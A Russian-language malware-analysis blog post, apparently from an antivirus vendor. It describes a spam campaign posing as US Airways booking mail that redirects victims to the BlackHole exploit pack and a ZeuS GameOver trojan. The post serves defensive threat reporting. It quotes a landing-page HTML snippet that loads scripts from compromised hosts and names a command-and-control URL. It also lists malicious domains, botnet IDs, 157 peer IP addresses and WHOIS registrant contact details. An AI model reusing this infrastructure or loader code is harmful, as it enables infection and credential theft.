ZeuS-подарок для пассажиров US Airways

Спам

20-го марта мы зафиксировали спам-рассылку, нацеленную на пассажиров авиакомпании US Airways. В течение практически всей прошлой недели многочисленным пользователям якобы от компании US Airways рассылалось письмо следующего содержания:

В письме-подделке описывается процесс регистрации полета и приводится код подтверждения для онлайн-бронирования.

По замыслу злоумышленников, если такое письмо получит пассажир, который собирается лететь указанным в письме рейсом, то он, скорее всего, пройдет по ссылке «Online reservation details» («Детали онлайн-бронирования»).

Ссылки в рассылаемых письмах отличались — например, мы видели ссылки на следующие домены: sulichat.hu, prakash.clanteam.com, panvelkarrealtors.com.
Пройдя по ссылке, в результате серии редиректов пользователь попадал на страницу с эксплойт-паком BlackHole.

Эксплойт-пак BlackHole: редиректы и заражение

Используется типичная для BlackHole схема заражения.
Сначала по ссылке в письме пользователь попадает на страничку с html-кодом следующей структуры:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=»text/javascript» src=»http://boemelparty.be/<removed>/js.js»></script>
<script type=»text/javascript» src=»http://nhb.prosixsoftron.in/<removed>/js.js»></script>
<script type=»text/javascript» src=»http://sas.hg.pl/<removed>/js.js»></script>
<script type=»text/javascript» src=»http://www.vinhthanh.com.vn/<removed>/js.js»></script>
<script type=»text/javascript» src=»http://www.alpine-turkey.com/<removed>/js.js»></script>
<script type=»text/javascript» src=»http://www.thedugoutdawgs.com/<removed>/js.js»></script>
</html>

В результате с разных доменов в браузер пользователя загружаются скрипты, которые по сути являются редиректами — в них содержится команда вида «document.location=’http://indigocellular.com/'». Эта команда направляет пользователя на страничку, код которой содержит обфусцированный javascript.

Результатом работы javascript является вставка в код страницы ссылки на объект с эксплойтом. Мы обнаружили 3 вида таких объектов: jar-файл, swf-файл и документ pdf. Каждый из этих объектов эксплуатирует уязвимость в соответствующем приложение – Java, Flash Player или Adobe Reader, — чтобы запустить на атакуемой машине вредоносный код. Если пользователь использует уязвимую версию хотя бы одного из таких приложений, атака проходит успешно, и на компьютер пользователя загружается и запускается вредоносный исполняемый файл.

Вредоносные jar, swf и pdf документы грузятся с разных доменов — в частности, indigocellular.com, browncellular.com, bronzecellular.com (информация по этим доменам) — под именами Qai.jar, field.swf, dea86.pdf, 11591.pdf.

Эти файлы с эксплойтами ЛК детектирует как:
Exploit.Java.CVE-2011-3544.mz
Exploit.SWF.Agent.gd
Exploit.JS.Pdfka.fof

В результате использования уязвимостей с тех же доменов, на которых размещены эксплойты, загружается исполняемый файл. Он может грузиться под разными именами (about.exe, contacts.exe и др.) и по сути является загрузчиком. Загрузчик при запуске связывается с командным центром по URL “176.28.18.135/pony/gate.php”, загружает и запускает на компьютере пользователя другую вредоносную программу — ZeuS/ZBot, точнее, модификацию одной из веток разработки этого троянца, известную под названием GameOver.

ZeuS грузится со взломанных сайтов, в их числе:
cinecolor.com.ar
bizsizanayasaolmaz.org
cyrpainting.cl
hellenic-antiaging-academy.gr
elektro-pfeffer.at
grupozear.es
sjasset.com

Полиморфизм

На всех этапах этой атаки все объекты — домены, ссылки на javascript, файлы с эксплойтами, загрузчик и ZeuS — довольно быстро заменялись новыми. Домены «жили» примерно 12 часов, самплы ZeuS менялись чаще.

За те небольшие промежутки времени, в которые велось наблюдение, мне удалось зафиксировать 6 модификаций загрузчика и 3 модификации ZeuS.

Напомню, что одной модификации соответствуют все версии вредоносной программы, которые детектируются с одним и тем же вердиктом, то есть число задетектированных программ, как правило, превышает число вердиктов.

Вердикты загрузчика:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Trojan-PSW.Win32.Fareit.oo
Trojan-PSW.Win32.Fareit.pb
Trojan.Win32.Jorik.Downloader.ams

Общее число программ, задетектированных этими вердиктами: 250.

Вердикты ZeuS:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx

Общее число самплов, задетектированных этими вердиктами: 127.

Как уже было сказано выше – это только те вердикты, за которыми мне удалось уследить. За все время спам-кампании новых модификаций появилось, конечно же, больше.

Идентификаторы ботнетов

У ZeuS менялась не только обертка (пакер, антиэмуляция), пересобирался и сам зловред. В нем менялись идентификатор ботнета и некоторые «вшитые» IP-адреса компьютеров, с которыми ZeuS пытается установить связь при заражении. Причем, скорее всего, идентификатор ботнета и IP-адреса менялись при каждой второй перепаковке.

Проанализировав 48 версий различных модификаций ZeuS, которые злоумышленники использовали в этой атаке, я выявил 19 уникальных идентификаторов ботнетов:

chinz22 chinz24 blk25

mmz22 mmz24 mmz25
molotz25 NR22 NR23 NR24 NR25 ppcz22
ppcz23 ppcz24 rnato25 rubz22 rubz23 rubz24
zuu

В отличие от традиционного ZeuS, в котором, как правило, содержится один адрес для получения файла конфигурации, в каждом сампле GameOver «зашито» 20 IP-адресов с портами. Заразив компьютер, GameOver пытается установить соединение по этим адресам, чтобы сообщить о себе, получить информацию, например, веб-инжекты, отослать перехваченные у пользователя данные.

Из 960 IP-адресов, полученных в результате анализа 48 самплов, уникальных оказалось 157:

+Развернуть список ip-адресов

109.86.20.192:25071 111.252.183.142:22376 114.149.70.68:11807 114.41.42.83:23061 114.47.174.132:25602
116.68.106.249:17051 116.74.63.215:28397 117.197.130.195:17253 117.200.28.128:26895 121.96.154.99:18978
122.120.6.124:22322 122.26.48.225:25178 123.231.81.178:20129 124.13.56.101:15582 125.25.55.156:20834
140.130.36.32:13590 143.90.182.68:15121 151.40.222.25:19197 161.24.7.83:28740 165.228.237.204:17223
173.11.33.57:28198 175.141.221.126:24400 177.17.3.94:14470 177.41.72.204:19922 177.42.233.93:13577
177.42.26.217:14084 178.121.5.147:22245 178.156.170.215:14697 180.234.242.6:12692 186.122.42.176:21468
186.146.109.235:28038 186.169.207.31:25267 186.206.85.241:29592 186.212.252.139:26376 186.61.97.233:18271
187.21.121.179:29597 187.52.165.241:25003 187.59.156.215:23810 187.78.48.90:28054 188.24.177.174:20670
188.24.183.30:20670 188.24.42.247:29919 188.24.91.76:18603 188.24.94.127:18603 188.25.32.93:18509
188.26.246.185:21181 188.27.192.140:10991 188.27.77.6:14351 189.103.58.227:15863 189.106.203.3:22619
189.113.210.69:16075 189.58.63.42:23810 190.11.42.132:16838 190.183.196.38:27445 190.200.120.150:17663
190.201.27.240:12618 190.231.254.101:11271 190.26.120.90:22952 2.40.249.44:23266 200.109.42.212:25890
200.126.164.122:25565 200.84.130.185:29346 201.145.184.97:25585 201.173.212.122:25493 201.21.14.224:19004
201.58.108.117:19986 201.58.79.254:19986 202.149.67.164:26124 206.219.64.130:21401 208.180.223.27:12046
213.163.112.183:22254 213.164.225.186:25619 216.187.184.34:28333 218.170.36.242:13286 218.170.42.95:13286
221.133.18.131:12492 222.124.55.128:29563 24.154.22.50:13524 27.119.46.174:22985 27.4.113.69:27664
41.102.165.37:29870 41.252.115.102:25734 46.197.66.43:29879 49.128.175.94:24566 50.129.124.49:28454
60.246.131.173:23424 61.78.79.8:16362 66.193.204.141:26171 68.127.16.166:22762 68.150.204.237:16150
71.11.205.72:23114 72.185.157.254:29727 72.199.188.132:25142 72.64.43.86:21316 75.108.18.26:21332
75.127.204.90:10945 75.35.88.121:26277 76.185.32.7:18942 77.254.230.170:15741 78.166.182.155:12114
78.61.173.28:22352 78.62.246.91:16094 78.87.143.67:21277 79.112.219.78:13525 79.112.231.138:13644
79.113.104.28:29098 79.113.104.97:29098 79.115.143.244:16824 79.115.226.238:14247 79.116.121.163:14751
79.116.28.147:27683 79.117.177.174:12523 79.118.247.63:14481 79.38.117.69:18242 79.39.241.147:29216
79.47.239.67:28246 81.0.94.178:27735 81.214.253.235:13820 81.64.159.213:22322 81.65.125.102:24715
82.131.113.220:15271 82.131.141.80:27735 82.211.174.146:25219 82.88.65.111:17345 83.228.43.66:11167
83.4.30.245:21628 84.232.253.30:19202 84.32.66.38:25067 85.110.206.175:22346 85.250.176.250:15494
86.121.16.63:27337 86.124.108.93:20225 87.126.224.174:11314 87.207.108.163:14491 87.24.128.66:14935
88.235.4.104:22459 88.250.42.18:14086 89.120.100.121:19228 89.136.130.155:22321 89.137.18.224:21326
91.127.173.36:10734 91.179.41.185:15941 91.179.41.185:24693 92.241.134.103:26870 94.122.71.97:11842
94.203.147.11:20599 94.39.240.218:14338 94.53.198.35:24596 94.66.81.228:15663 95.104.111.141:11838
95.226.45.198:18846 95.56.143.17:23352 95.9.163.52:24483 97.78.7.0:10159 99.169.224.231:22266
99.190.137.80:12109 99.7.203.52:18700


География атаки

Могу предположить, что на прошлой неделе для распространения ZeuS использовалось не только спам-письмо со ссылкой на подтверждение онлайн-бронирования полетов в компании US Airways. Злоумышленникам не откажешь в оригинальности — хотя они уже не раз прибегали к теме, связанной с авиаперелетами, но такой спам замечен впервые. Если получатель письма входит в целевую аудиторию, то с большой вероятностью нажмет на вредоносную ссылку. Однако большинство пользователей, получивших такое письмо, никуда не собирались лететь, так что среагировали на него немногие.

Очевидно, рассылались и другие спамовые письма со ссылками, которые вели на те же сайты, те же эксплойты и на те же вредоносные программы, о которых рассказано выше. Я посмотрел, в каких странах на прошлой неделе на компьютерах наших пользователей чаще всего блокировались угрозы, так или иначе связанные с этой атакой. Ниже приведено распределение детектов эксплойтов, загрузчиков и модификаций ZeuS, использованных злоумышленниками, по странам:

Россия 32.8%
США 10.3%
Италия 9.2%
Германия 8.6%
Индия 6.9%
Франция 3.8%
Украина 3.6%
Польша 3.2%
Бразилия 3.1%
Малайзия 3%
Испания 2.9%
Китай 2.7%

P.S. Информация о некоторых вредоносных доменах, замеченных в описанной спам-кампании:

indigocellular.com 209.59.218.102
Зарегистрирован на: Nicholas Guzzardi, clarelam@primasia.com
5536 Gold Rush Dr.NW
87120 Albuquerque
United States
Tel: +1.5053505497
browncellular.com 174.140.168.207
Зарегистрирован на: Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US
bronzecellular.com 96.9.151.220
Зарегистрирован на: Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US

function showSpoiler()
{
var inner = document.getElementById («tmpdiv»);
var sp_a = document.getElementById («spoiler_anchor»);
if (inner.style.display == «none»)
{
inner.style.display = «»;
sp_a.innerHTML = «-Свернуть список ip-адресов»;
}
else
{
inner.style.display = «none»;
sp_a.innerHTML = «+Развернуть список ip-адресов»;
}
}

Публикации на схожие темы

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *